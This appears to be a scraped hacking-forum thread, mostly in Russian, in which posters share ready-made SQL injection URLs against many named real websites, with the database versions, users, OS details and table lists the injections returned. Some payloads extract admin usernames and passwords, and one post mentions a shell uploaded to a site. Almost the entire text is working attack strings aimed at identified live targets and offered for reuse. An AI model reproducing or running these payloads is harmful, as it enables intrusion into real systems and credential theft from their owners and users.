http://www.diabetes.ee/foorum-teema.php?lk=-33681+union+select+1,2,3,4,concat(user(),version(),database(),@@version_compile_os)-- http://www.megazone.ee/index2.php?id=5&news_id=-3+union+select+1,concat(username,char(32,58,32),password),3,4+from+cms_admin-- еще кто то тут шелл загрузил )) http://www.megazone.ee/dev/pic_big.php
Code: http://www.tutpricol.ru/message.php?id=-92+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user()),5-- User: tutpric5_root@localhost Database: tutpric5_tutpricol Version: 4.1.25-log
Сайт: http://www.mebek.ru ТИЦ: 20 PR: 2 Пример запроса: Code: http://www.mebek.ru/index4.php?id=-9+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)--+ version - 4.1.22 user - [email protected] database - wwwmebekru os - portbld-freebsd7.0 ========================================= Сайт: http://www.maslov-pr.com ТИЦ: 70 PR: 3 Пример запроса: Code: http://www.maslov-pr.com/index5.php?a=6&poda=7&id=-3+union+select+1,2,3,unhex(hex(concat_ws(0x0b,version(),user(),database(),@@version_compile_os)))--+ version - 4.1.18 user - [email protected] database - wwwmaslovprcom_1 os - unknown-linux-gnu ========================================= Сайт: http://www.moloko-nsk.ru ТИЦ: 0 PR: 1 Пример запроса: Code: http://www.moloko-nsk.ru/index4.php?id=-17+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)--+ version - 5.0.90-community user - ipdenis_admin@localhost database - ipdenis_moloko os - pc-linux-gnu tables: Code: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, cute_categories, cute_comments, cute_flood, cute_ipban, cute_news, cute_story, cute_users, categg, email, files, kapital_zed_admin_menu, kapital_zed_articles, kapital_zed_brotator, kapital_zed_category, kapital_zed_form, kapital_zed_news, kapital_zed_pages, kapital_zed_redirect, kapital_zed_site_menu, kapital_zed_siteinfo, kapital_zed_tplblock, kapital_zed_tplmanager, kapital_zed_users, tovari, zed_news, zed_news2, cute_categories, cute_comments, cute_flood, cute_ipban, cute_news, cute_story, cute_users, files, kapital_zed_admin_menu, kapital_zed_articles, kapital_zed_brotator, kapital_zed_category, kapital_zed_form, kapital_zed_news, kapital_zed_pages, kapital_zed_redirect, kapital_zed_site_menu, kapital_zed_siteinfo, kapital_zed_tplblock, kapital_zed_tplman ========================================= Сайт: http://ratukencana.com ТИЦ: 0 PR: 0 Примеры запросов: Code: http://ratukencana.com/index4.php?id=1&idc=15&idp=-14+union+select+concat_ws(0x0b,version(),user(),database(),@@version_compile_os),2,3--+ http://ratukencana.com/index4.php?id=1&idc=15&idp=-14+union+select+group_concat(0x0b,nm_user,0x3a,pwd_user),2,3+from+sys_users--+ version - 5.0.51a-24+lenny3 user - t54052_root@localhost database - t54052_ratukencana os - debian-linux-gnu tables: Code: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, master_item, menu_item, menu_page, rel_brand_category, sys_users, tb_brand, tb_categor
Code: http://www.effedieffe.com/interventizeta.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20-- Database: effedieffe_old Version: 5.0.77-log User: fdfdbuser@localhost PR: 6 сначала думал - боян, т.к. скуль с этого сайта уже была. но там совсем другая bd. если неправ, удалите.
Code: http://www.interarmees.fr/article.php?article=-1020+union+all+select%201,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,5,6,7,8-- 5.0.51a-24+lenny3:interarmees_web:interarmees@gcc-www
http://www.teamarena.ru/user_gallery/10556+union+select+1,2,concat(version(),user(),database()),4,5,6,7
Code: http://www.koliz.nnov.ru/catalog/?action=printprod&prod_id=-109%20union%20select%201,concat%28version%28%29,0x7e,user%28%29,0x7e,database%28%29,0x7e,@@version_compile_os%29%20-- 5.0.87-log~koliz@localhost~koliz~portbld-freebsd6.4 - version,user,database,os Code: http://www.alkom.nnov.ru/catalog/?prod_id=-109%20union%20select%201,concat_ws%280x3a,version%28%29,user%28%29,database%28%29,@@version_compile_os%29%20-- 5.0.87-log : alkom@localhost : alkom : portbld-freebsd6.4 Code: http://users.kharkiv.com/orgtech/index.php?page=show_tovar&tovar_id=-16%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,user%28%29,database%28%29,@@version_compile_os%29,10,11,12,13-- 4.0.27 : orgtech@localhost : orgtech : portbld-freebsd5.4
www.autogazette.de/printable.php?id=-2000757 union select 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6--
quakerbridgemall.com PR-5 Code: http://www.quakerbridgemall.com/offers.php?id=39+union+all+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,0+--+ Code: 5.0.27:quakerdb2user@localhost:QuakerDB2
Сайт - http://www.animationtrip.com ТИЦ: 10 PR: 4 Пример запроса: Code: http://www.animationtrip.com/item.php?id=-257+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4--+ version - 4.1.22-standard-log user - animationtrip@localhost database - animationtrip os - pc-linux-gnu =========================================== Сайт: http://www.paer.ru ТИЦ: 130 PR: 3 Пример запроса: Code: http://www.paer.ru/info/item.php?id=11+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))--+ version - 5.0.75-log user - [email protected] database - srv19733_db1 os - portbld-freebsd7.0 =========================================== Сайт: http://plusiminus.com ТИЦ: 170 PR: 4 Пример запроса: Code: http://plusiminus.com/item.php?id=412+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))--+ version - 5.1.41-log user - [email protected] database - db35978m os - portbld-freebsd8.0 =========================================== Сайт: http://www.purepeopleproducts.com ТИЦ: 0 PR: 3 Пример запроса: Code: http://www.purepeopleproducts.com/index5.php?id=-12+union+select+concat_ws(0x0b,version(),user(),database(),@@version_compile_os)--+ version - 5.0.51a-3ubuntu5.5-log user - CN20070091@localhost database - CN20070091_ppp os - debian-linux-gnu tables: Code: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, _mailtemplates, _metavars, adres, artikel, artikel_rubriek, artikel_verpakking, artikelomschr, betaalwijze, boxtype, branche, collectie, collectie_omschr, collectie_slides, contactpersoon, country, custstatus, dessin, factuur, form, functie, gebruikers, gebruikersrol, hangtag, hscode, info_slides, infoitem, interface_wrds, klant, klant_contact, klant_item, klant_item_status, klant_item_type, klant_resp, kleur, land, levering, levertijd, maat, mailing, materiaal, menu_slides, menuitem, orderopmerking, packingperpcs, ppplabel, producent, producent_collectie, producent_contact, productieorderregel, productieorders, productieorderstatus, productietijd, profiel, rubriek, sidelabel, silverlogo, slides, temp, transport, transporteur, verkooporder, verkooporderregel,
Code: https://www.infoslice.com/?cmd=del&id=-1+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++ User: infoslice@localhost Database: infoslice Version: 5.1.44 Code: http://www.knowledgeforaction.info/articoloPrt.php?id=-1+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3/* User: de [email protected] Database: kfainfo_db Version: 4.0.27-max-log
Сайт: http://tractor.ru ТИЦ: 2000 PR: 5 Пример запроса: Code: http://tractor.ru/partners/index5.php?id=-11767+union+select+1,db_name(),@@version,system_user,user,6,7,8,9,10,11,12,13--+ version - Microsoft SQL Server 2005 - 9.00.4053.00 (X64) May 26 2009 14:13:01 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) system user - specserver-2 user - dbo database - specserver-2 =========================================== Сайт: http://www.bxllaique.be ТИЦ: 0 PR: 5 Пример запроса: Code: http://www.bxllaique.be/index5.php?m1=0&m2=2&id=52&g=2+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(unhex(hex(@@version_compile_os)),+1,+63),+floor(rand(0)*2)))--+ version - 4.1.9-standard-log user - bxllaique@localhost database - bxllaique os - pc-linux-gnu =========================================== Сайт: http://www.capstonetea.com ТИЦ: 0 PR: 3 Пример запроса: Code: http://www.capstonetea.com/index4.php?ID=11+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2))) version - 4.1.22-standard user - capstone_capston@localhost database - capstone_CapstoneWeb os - pc-linux-gnu
Пара немчиков Code: http://www.neusserkarneval.de/presse/show.php?id=-1+union+select+1,database(),version(),4,5,6,7,8,user(),10,11,12,13,14%20-- Database: db215839 Version: 4.1.22-standard-log User: db215839@local2 Code: http://www.art-in.de/incmeldung.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8%20-- Database: db1082979-artintv Version: 5.0.32-Debian_7etch11-log User: dbu1082979@localhost PR: 4 ТИЦ: 20 ===================================================================== Любителям металла Code: http://www.avantgarde-metal.com/content/stories2.php?id=-86%27%20union%20select%201%2C%202%2C%20concat_ws(0x3a,database(),version(),user())%2C%204%2C%205%2C%205%23%20AND%20%271%27=%271 Database: d0052127 Version: 4.1.22-max-log User: d0052127@localhost PR: 3 Code: http://suriyanto.net/rock/rockmusic.php?id=3337'+union+select+1,2,3,4,5,6,7,8%23+AND+%271%27=%271 Database: suriyant_muziek Version: 5.0.81-community User: suriyant_yanto@localhost PR: 3 ===================================================================== Code: http://www.brushesdownload.com/tfile.asp?id=-1250'+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7' Databese: dbbrushesdownload Version: 5.1.45-community User: brushesd@C24327-34937 PR: 4 Code: http://www.carbodydesign.com/video/?id=-2990+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,database(),version(),user()),11,12,13,14,15,16,17,18,19,20,21%20-- Database: carbodyd_db Version: 5.0.90-community User: carbodyd_dbuser@localhost PR: 3 ТИЦ: 80
Code: www.javaportal.ru/books/aboutbook.php?id=30UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12-- Code: fruitharvesting.com/productinfo.php?id=52UNION ALL SELECT 1,%String_Col%,3,4 and 'x'='x Code: www.brill.se/productInfo.php?id=111UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- Code: www.atmtravel.com.au/productinfo.php?id=-123 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- Code: www.hypetrading.com/productinfo.php?id=285UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9-- Code: www.jemesp.com/productInfo.php?id=4UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- Code: www.wedding-cake-toppers.com.au/productinfo.php?ID=15 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9-- Code: www.crestonsfurnishings.co.uk/productinfo.php?id=212 AND %True_Expression% AND 'x'='x Code: www.jemesp.com/productInfo.php?id=4 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- Code: www.theshopnyny.com/productinfo.php?id=928UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- Code: www.gmscsolution.com/productinfo.php?id=384 UNION ALL SELECT 1,%String_Col%,3,4,5-- Code: www.fullcirclefurnishings.com/productinfo.php?id=213 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x Code: www.bugnbots.com/productinfo.php?ID=6 UNION ALL SELECT %String_Col%,2,3,4-- Code: www.luckinthebox.com/productinfo.php?id=262 AND %True_Expression% Code: www.kingsleysestates-furnishings.co.uk/productinfo.php?id=411 AND %True_Expression% AND 'x'='x Code: www.crestonsfurnishings.co.uk/productinfo.php?id=212 AND %True_Expression% Code: superwholesales.com.au/productinfo.php?id=10 AND %True_Expression% Code: marqueeequity.com/productinfo.php?id=9 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- Code: www.idoweddingfavours.com.au/productinfo.php?ID=406 UNION ALL SELECT %String_Col%,2,3,4,5,6,7-- Code: fruitharvesting.com/productinfo.php?id=49 UNION ALL SELECT 1,%String_Col%,3,4 and 'x'='x Code: www.blackkatzfurnishings.com/productinfo.php?id=499 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x Code: fullcirclefurnishings.com/productinfo.php?id=367 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x
http://response.restoration.noaa.gov/faq_topic.php?faq_topic_id=-1+union+select+1,2,concat(user(),char(58),version(),char(58),database(),char(58),@@version_compile_os),4,5,6,7,8,9,10+from+users--
Code: http://www.assetrisk.com/about-us/people.php?ID=-34+union+select+1,2,3,4,5,6,7,8+--+ Version: 5.0.51a-community-nt User: root@localhost Database: assetrisk
Code: http://www.magelectric.ru/?p=-196+union+all+select+1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4,5,6,7+-- version : 5.0.22 user : magelectric@localhost database : magelectric os : redhat-linux-gnu
Сайт: http://www.ncgtourism.ca ТИЦ: 0 PR: 4 Пример запроса: Code: http://www.ncgtourism.ca/index4.php?id=-1+union+select+1,@@version_compile_os--+ version - 4.1.20 user - tourism@localhost database - toursitedb os - redhat-linux-gnu ========================================== Сайт: http://www.onaonline.ru ТИЦ: 30 PR: 3 Пример запроса: Code: http://www.onaonline.ru/news_box.php?idnews=407'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7--+ version - 5.0.26-log user - onaonline@localhost database - onaonline os - pc-linux-gnu ========================================== Сайт: http://www.gazteplostroi.ru ТИЦ: 30 PR: 0 Пример запроса: Code: http://www.gazteplostroi.ru/item.php?id=-138'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),null,null,6,7,now()+from+information_schema.tables--+ version - 5.0.77 user - intertime_gaz@localhost database - intertime_gaz os - pc-linux-gnu tables: Code: CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, INNODB_BUFFER_POOL_CONTENT, INDEX_STATISTICS, KEY_COLUMN_USAGE, PROCESSLIST, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TABLE_STATISTICS, TRIGGERS, USER_PRIVILEGES, USER_STATISTICS, VIEWS, INNODB_IO_PATTERN, gts_about, gts_articles, gts_catalog, gts_catalog_cats, gts_contacts, gts_docs, gts_faq, gts_faq_cats, gts_links, gts_links_cats, gts_news, gts_pages, gts_price, pm_routelinks, pm_routelinks_cat
Code: http://theosophytrust.org/tlodocs/articlesRC.php?d=The_Occult_Side_Of_Nature.htm&p=-35+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10--+ version:4.0.27-max-log user:[email protected] Code: http://www.truthcommission.org/commission.php?lang=en&cid=0+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5--+ version:5.0.77:37614_dbtruthcom user:[email protected]
http://www.finishertriatlon.com/revista/noticias.php?id=-121+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database(),@@version_compile_os),1),1),3,4,5&year=2010
